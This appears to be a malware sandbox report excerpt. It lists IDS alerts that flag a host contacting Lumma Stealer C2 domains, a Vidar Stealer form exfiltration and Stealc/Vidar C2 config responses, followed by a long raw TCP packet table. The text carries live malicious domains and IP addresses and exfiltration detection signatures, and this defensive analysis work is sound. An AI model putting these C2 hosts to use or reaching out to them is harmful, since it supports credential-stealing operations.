2024-09-27T00:16:26.236407+0200	2056157	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)	1	192.168.2.5	49764	104.21.58.182	443	TCP
2024-09-27T00:16:26.440112+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49765	5.75.211.162	443	TCP
2024-09-27T00:16:26.704771+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49764	104.21.58.182	443	TCP
2024-09-27T00:16:26.704771+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49764	104.21.58.182	443	TCP
2024-09-27T00:16:27.198987+0200	2056155	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)	1	192.168.2.5	49766	188.114.97.3	443	TCP
2024-09-27T00:16:27.666864+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49766	188.114.97.3	443	TCP
2024-09-27T00:16:27.666864+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49766	188.114.97.3	443	TCP
2024-09-27T00:16:27.924182+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.5	49767	45.132.206.251	80	TCP
2024-09-27T00:16:28.147477+0200	2056153	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)	1	192.168.2.5	49768	188.114.96.3	443	TCP
2024-09-27T00:16:28.573022+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49768	188.114.96.3	443	TCP
2024-09-27T00:16:28.573022+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49768	188.114.96.3	443	TCP
2024-09-27T00:16:29.128963+0200	2056151	ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)	1	192.168.2.5	49769	172.67.208.139	443	TCP
2024-09-27T00:16:29.565402+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49769	172.67.208.139	443	TCP
2024-09-27T00:16:29.565402+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49769	172.67.208.139	443	TCP
2024-09-27T00:16:31.910257+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49771	172.67.128.144	443	TCP
2024-09-27T00:16:31.910257+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49771	172.67.128.144	443	TCP
2024-09-27T00:16:47.745387+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49773	5.75.211.162	443	TCP
2024-09-27T00:16:49.032858+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49774	5.75.211.162	443	TCP
2024-09-27T00:16:50.330687+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49775	5.75.211.162	443	TCP
2024-09-27T00:16:51.699043+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49776	5.75.211.162	443	TCP
2024-09-27T00:16:52.396392+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.5	49776	TCP
2024-09-27T00:16:53.063283+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49777	5.75.211.162	443	TCP
2024-09-27T00:16:53.765601+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.5	49777	TCP
2024-09-27T00:16:54.509791+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49778	5.75.211.162	443	TCP
2024-09-27T00:16:55.519404+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49779	5.75.211.162	443	TCP
2024-09-27T00:16:58.589240+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49780	5.75.211.162	443	TCP
2024-09-27T00:16:59.819449+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49781	5.75.211.162	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 00:14:58.345906019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:58.352458954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:58.352541924 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:58.352767944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:58.359148979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:58.969877958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:58.970129013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:58.973582983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:58.980310917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.183753967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.184300900 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.185915947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.192557096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.363838911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.363856077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.363925934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.365458965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.371818066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.543374062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.543394089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.543462992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.543473005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.543492079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.543523073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.543523073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.543867111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.543879032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.543890953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.543915987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.543931007 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.545854092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.545949936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.545986891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.546025991 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.547557116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.553925037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.725159883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.725330114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.741317034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.741386890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.747467995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.747839928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.750387907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.939654112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:14:59.939795017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.943234921 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:14:59.951014042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.117306948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.117322922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.117335081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.117346048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.117427111 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.117481947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.117650032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.117717981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.117736101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.117765903 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.117923021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.117933989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.117949963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.117965937 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.117969990 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.117985964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.118019104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.118037939 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.118864059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.118875980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.118889093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.118922949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.118947983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.118952990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.119005919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.119642973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.119654894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.119664907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.119704962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.119733095 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.196079969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.196108103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.196120977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.196247101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.196258068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.196264029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.196269035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.196281910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.196310997 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.196351051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.204134941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.204169035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.204180956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.204205036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.204224110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.204231024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.204236984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.204276085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.204646111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.204703093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.204737902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.204749107 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.204760075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.204771042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.204788923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.204823017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.205322981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.205333948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.205347061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.205378056 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.205393076 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.205560923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.205573082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.205624104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.206167936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.206180096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.206191063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.206226110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.206259966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.206260920 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.206271887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.206321001 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.206352949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.207039118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.207051992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.207066059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.207104921 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.207139969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.274997950 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.275142908 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.276081085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.276103973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.276137114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.276144981 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.276156902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.276170969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.276175976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.276189089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.276206970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.276225090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.276500940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.276551008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.276700974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.276743889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.282953024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.282978058 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.282993078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.283010006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.283039093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.283066034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.283195972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.283211946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.283226013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.283237934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.283268929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.283337116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.283364058 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.283395052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.283415079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.283977032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.284002066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.284024000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.284030914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.284054995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.284055948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.284076929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.284087896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.291320086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291338921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291357994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291409016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.291456938 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.291656971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291673899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291690111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291704893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291708946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.291733027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.291744947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291759968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291763067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.291779041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291795015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291805983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.291805983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.291812897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.291831017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.291858912 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.292560101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.292581081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.292597055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.292606115 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.292634964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.292676926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.292692900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.292706966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.292721987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.292761087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.293521881 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.293548107 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.293562889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.293564081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.293581009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.293596029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.293596029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.293612003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.293626070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.293651104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.294395924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.294420958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.294440031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.294446945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.294480085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.294495106 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.294712067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.294728994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.294745922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.294771910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.294771910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.294790983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.295305967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.295322895 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.295339108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.295353889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.295356035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.295381069 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.295416117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.337955952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.337994099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.338046074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.338073015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.361937046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.361958027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.361973047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.362001896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.362061024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.362075090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.362087011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.362098932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.362121105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.362147093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.362979889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.362993956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.363006115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.363040924 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.363064051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.369680882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.369751930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.369828939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.369841099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.369853020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.369863987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.369870901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.369880915 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.369884014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.369913101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.369920969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.369930029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.369940996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.369956017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.369996071 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.370687008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.370752096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.370779991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.370791912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.370804071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.370815992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.370830059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.370860100 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.370901108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.370918036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.370929956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.370943069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.370955944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.370984077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.371695995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.371727943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.371735096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.371794939 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.371871948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.371889114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.371901035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.371910095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.371917963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.371958971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.378025055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378041029 CEST	80	49708	46.8.231.109	192.168.2.5
